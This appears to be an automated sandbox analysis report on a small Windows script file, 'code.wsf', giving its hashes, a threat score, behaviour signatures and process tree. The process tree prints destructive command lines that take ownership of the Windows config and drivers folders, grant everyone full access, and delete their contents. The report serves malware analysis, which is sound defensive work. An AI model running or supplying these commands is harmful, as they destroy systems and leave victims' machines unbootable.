Analysis

  • max time kernel
    120s
  • max time network
    121s
  • platform
    windows7_x64
  • resource
    win7-20240729-en
  • resource tags

    arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system
  • submitted
    15-08-2024 21:42

General

  • Target

    code.wsf

  • Size

    3KB

  • MD5

    57a8ed12915b612b81ec573f56394818

  • SHA1

    f834294e6d6a7150da076670825857960df8a7a2

  • SHA256

    0461ce4eb37d43545491e5d2a9c42b673669378cba5cfa141be1cc0280dfdedf

  • SHA512

    2bdfeff4bd4ce78baeeddca3be307c1ca263034703e4bbccbe360b9cc32c43df0fa2279e893b4ebbf3a27832de6d575dff6297b4ae16dba628e7c7115897ca68

Score
8/10

Malware Config

Signatures

  • Possible privilege escalation attempt 4 IoCs
  • Modifies file permissions 1 TTPs 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 21 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "copy C:\Users\Admin\AppData\Local\Temp\code.wsf C:\Users\Admin\AppData\Local\Temp\code.wsf.vbs && start C:\Users\Admin\AppData\Local\Temp\code.wsf.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2108
    • C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\code.wsf.vbs"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2356
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c takeown /f c:\windows\system32\config\* >nul && icacls c:\windows\system32\config\* /grant everyone:(f) >nul && del /s /q c:\windows\system32\config\* >nul 2>&1
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1616
        • C:\Windows\system32\takeown.exe
          takeown /f c:\windows\system32\config\*
          4⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:2628
        • C:\Windows\system32\icacls.exe
          icacls c:\windows\system32\config\* /grant everyone:(f)
          4⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:2332
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c takeown /f c:\windows\system32\drivers\* >nul && icacls c:\windows\system32\drivers\* /grant everyone:(f) >nul && del /s /q c:\windows\system32\drivers\* >nul 2>&1
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1856
        • C:\Windows\system32\takeown.exe
          takeown /f c:\windows\system32\drivers\*
          4⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          • Suspicious use of AdjustPrivilegeToken
          PID:2156
        • C:\Windows\system32\icacls.exe
          icacls c:\windows\system32\drivers\* /grant everyone:(f)
          4⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:1812
  • C:\Windows\system32\wbem\WMIADAP.EXE
    wmiadap.exe /F /T
    1⤵
      PID:2268

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\code.wsf.vbs

      Filesize

      3KB

      MD5

      57a8ed12915b612b81ec573f56394818

      SHA1

      f834294e6d6a7150da076670825857960df8a7a2

      SHA256

      0461ce4eb37d43545491e5d2a9c42b673669378cba5cfa141be1cc0280dfdedf

      SHA512

      2bdfeff4bd4ce78baeeddca3be307c1ca263034703e4bbccbe360b9cc32c43df0fa2279e893b4ebbf3a27832de6d575dff6297b4ae16dba628e7c7115897ca68

    • C:\Users\Admin\Desktop\GrantUpdate.vbs

      Filesize

      77B

      MD5

      1fafd3091b9297603ea9989bed793089

      SHA1

      03688ce88040e39d04ec4a182427cf0992c827d6

      SHA256

      84a4fba54d165a54fdb5e5fff87530ebf488e5da855cadac11d54582858e67ac

      SHA512

      8273cf8d90b26a8247e8ac0317c1266a5ae24ba82dffe5f8b7ca46cb5ab8746aaf1eea089a4a6c1a9c612bb7d6f69ea944ed55c113e4da01d4cf53ac8cd44571

    • C:\Users\Admin\Downloads\OpenPublish.wav

      Filesize

      2B

      MD5

      81051bcc2cf1bedf378224b0a93e2877

      SHA1

      ba8ab5a0280b953aa97435ff8946cbcbb2755a27

      SHA256

      7eb70257593da06f682a3ddda54a9d260d4fc514f645237f5ca74b08f8da61a6

      SHA512

      1b302a2f1e624a5fb5ad94ddc4e5f8bfd74d26fa37512d0e5face303d8c40eee0d0ffa3649f5da43f439914d128166cb6c4774a7caa3b174d7535451eb697b5d